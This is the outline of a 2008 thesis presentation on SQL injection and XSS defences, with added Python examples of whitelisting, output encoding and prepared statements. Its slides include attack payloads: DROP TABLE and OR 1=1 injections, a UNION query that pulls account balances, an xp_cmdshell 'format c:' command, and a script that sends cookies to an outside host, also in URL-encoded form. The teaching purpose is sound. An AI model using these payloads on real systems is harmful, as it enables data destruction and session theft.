Whatever it takes: Fixing SQLIA and XSS in the process. Diploma Thesis Outline Presentation, Florian Thiel. Seminar Beiträge zum Software Engineering, FU Berlin, 11/06/2008
OWASP Top 10 2007: 1. XSS; 2. Injection Flaws; 3. Malicious File Execution; 4. Insecure Direct Object Reference; 5. Cross-Site Request Forgery
by xkcd: http://xkcd.com/327/
SELECT firstname FROM Students WHERE (login = '%s'); % login (by xkcd: http://xkcd.com/327/)
With login = Robert'); DROP TABLE Students; -- the query becomes:
SELECT firstname FROM Students WHERE (login = 'Robert'); DROP TABLE Students; -- ');
SQLIA threats: data integrity, confidentiality, new attack vector
UPDATE Users SET password = '%s' WHERE uid = '%s'; % (pw, uid)
UPDATE Users SET password = 'password' WHERE uid = 'robert' OR 1=1; -- '; (Integrity)
SELECT product FROM Products WHERE productid = '%s'; % pid
SELECT product FROM Products WHERE productid = '0 UNION SELECT owner, balance FROM Accounts; -- '; (Confidentiality)
SELECT product, price FROM products WHERE category = '%s'; % category
SELECT product, price FROM products WHERE categoryid = exec master..xp_cmdshell format c: -- ; (New Attack Vector)
Bad Mitigations: PHP addslashes(); IDS blacklisting; validation blacklisting
Decent Mitigations: stmt = prepare('SELECT name FROM Users WHERE uid = $1'); db.execute(stmt, uid)
Why it's hard: Control vs. Data
More problems: validation context != execution context; really tolerant DBs (SEL + ECT, anyone?); DBs trying to fix illegal SQL
Something different!? http://searchsite/search?keyword=<script>alert('you have been XSSed!')</script>
This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. -- Marc Slemko, Apache.org
eval(user input): 1) the essence of XSS; 2) limited only by the execution environment
XSS: code injection, popular in ECMAScript/Web 2.0
Got cookies? <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'+document.cookie</script>
Got cookies? The same payload, URL-encoded: %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
The Worm
(Non-working) XSS Mitigations: blacklisting of cribs; blacklisting of characters
Helpful mitigations: HTTPOnly cookies; whitelisting of characters
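As an added example (not from the slides), the two mitigation layers side by side for the search page shown earlier: whitelisting the keyword's characters at the input boundary, and encoding the keyword for the HTML execution context on output, which is the "validation context != execution context" point. The function names and the whitelist pattern are my choices; the sample keyword is the slide's payload, URL-decoded.

```python
import html
import re

# Whitelist of characters a search keyword may contain (assumed policy, not from the slides).
KEYWORD_WHITELIST = re.compile(r"^[A-Za-z0-9 ,.\-]{1,64}$")

# Constructed sample: the payload from the searchsite URL on the slide, URL-decoded.
XSS_KEYWORD = "<script>alert('you have been XSSed!')</script>"


def validate_keyword(keyword):
    """Input-boundary check: True only if every character is on the whitelist."""
    return bool(KEYWORD_WHITELIST.match(keyword))


def render_results_unsafe(keyword):
    """Reflects the parameter verbatim, so the browser parses it as markup."""
    return "<p>Results for: %s</p>" % keyword


def render_results_safe(keyword):
    """Encodes for the execution context (HTML body), independent of input validation."""
    return "<p>Results for: %s</p>" % html.escape(keyword, quote=True)
```

Validation and output encoding are independent: even a keyword that slipped past the whitelist is rendered as text by render_results_safe.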
Common flaws: HTML/XSS and SQL mix data and control; have no well-defined execution environment; have no API
Failure to sanitize data into a different plane
Safe Query Objects: real SQL API; adds static types; dynamic queries still runtime evaluated
AntiSamy: policy-based sanitation for HTML entities; types (by RegEx), no semantics
Another job well done!
GET /en-us/library/aa287673(vs.71).aspx HTTP/1.1
Host: msdn.microsoft.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-us; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cache-Control: max-age=0
Hmm, are we missing something here?
Absolutely!
The interesting* part (* what my thesis is really about)
Make sure that the technical solutions are thoroughly applied
1. Make developers use a reasonable architecture; 2. Make developers recognize a weakness when they meet one; 3. Make developers find weaknesses; 4. Make people actually fix things
1) Architecture: centralization; canonicalization; have to be conservative
2) Recognition: patterns?; flawed code examples in the wild
3) Detection: automated flow analysis; code inspection
Code inspection: need a reading technique; defect-based reading
Artifacts: reviewer annotates suspicious code regions, e.g. @userinput, @output; makes review work visible in the source code and more valuable since annotations can be reused
# @userinput(data)
# [insert data into query, ignore non-alphanums]
def insertalphanum(query, data):
    # [make sure data is canonical]
    c_data = data.tocharset(...)
    c_data.replace(...)
    ...
    # [insert data into query]
    query.prepare(...)
    query.insert(data, ...)
    ...
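An added example, not from the slides, that makes the insertalphanum sketch concrete in Python with sqlite3 and puts the %-formatted query from the xkcd slide next to the prepared-statement form from the "Decent Mitigations" slide, with the canonicalization step from the architecture slide in front of it. The Students table, the logins and the tautology input are constructed; rejecting non-alphanumerics (rather than ignoring them) and using NFKC plus lowercasing as the canonical form are my choices.

```python
import re
import sqlite3
import unicodedata

# Constructed in-memory stand-in for the Students table used on the slides.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Students (login TEXT, firstname TEXT)")
conn.executemany("INSERT INTO Students VALUES (?, ?)",
                 [("robert", "Robert"), ("alice", "Alice")])

ALPHANUM = re.compile(r"^[A-Za-z0-9]+$")

# Constructed inputs: a normal login and an OR 1=1 style tautology as on the slides.
NORMAL_LOGIN = "robert"
TAUTOLOGY_LOGIN = "x') OR ('1'='1"


def firstname_unsafe(login):
    """The %-formatted query from the slides: data is spliced into the control plane."""
    query = "SELECT firstname FROM Students WHERE (login = '%s')" % login
    return [row[0] for row in conn.execute(query)]


def firstname_bound(login):
    """Prepared statement: the value is bound and never parsed as SQL."""
    stmt = "SELECT firstname FROM Students WHERE (login = ?)"
    return [row[0] for row in conn.execute(stmt, (login,))]


def canonicalize(data):
    """One canonical form (NFKC, lowercase) before any validation happens."""
    return unicodedata.normalize("NFKC", data).lower()


def insertalphanum(login):
    """Concrete insertalphanum: canonicalize, whitelist, then bind.
    Rejects non-alphanumerics instead of silently ignoring them (my choice)."""
    c_login = canonicalize(login)
    if not ALPHANUM.match(c_login):
        raise ValueError("login must be alphanumeric after canonicalization")
    return firstname_bound(c_login)


def accepts(login):
    """True if insertalphanum accepts the login, False if it rejected it."""
    try:
        insertalphanum(login)
        return True
    except ValueError:
        return False
```

The fullwidth letter case in the checks shows why canonicalization precedes the whitelist: the same login written with a fullwidth R would otherwise be rejected or, worse, compared against a different string than the one validated.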
4) Repair: once a weakness is known, developers should be motivated enough; focus is on keeping the code secure, minimizing effort
My tasks: provide practical architectural assumptions; construct an effective reading method + awareness of potential weaknesses; get a project to adopt my methods
Questions?
This presentation is licensed under a Creative Commons BY-SA license. Attribution for pictures through links. Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Thank you!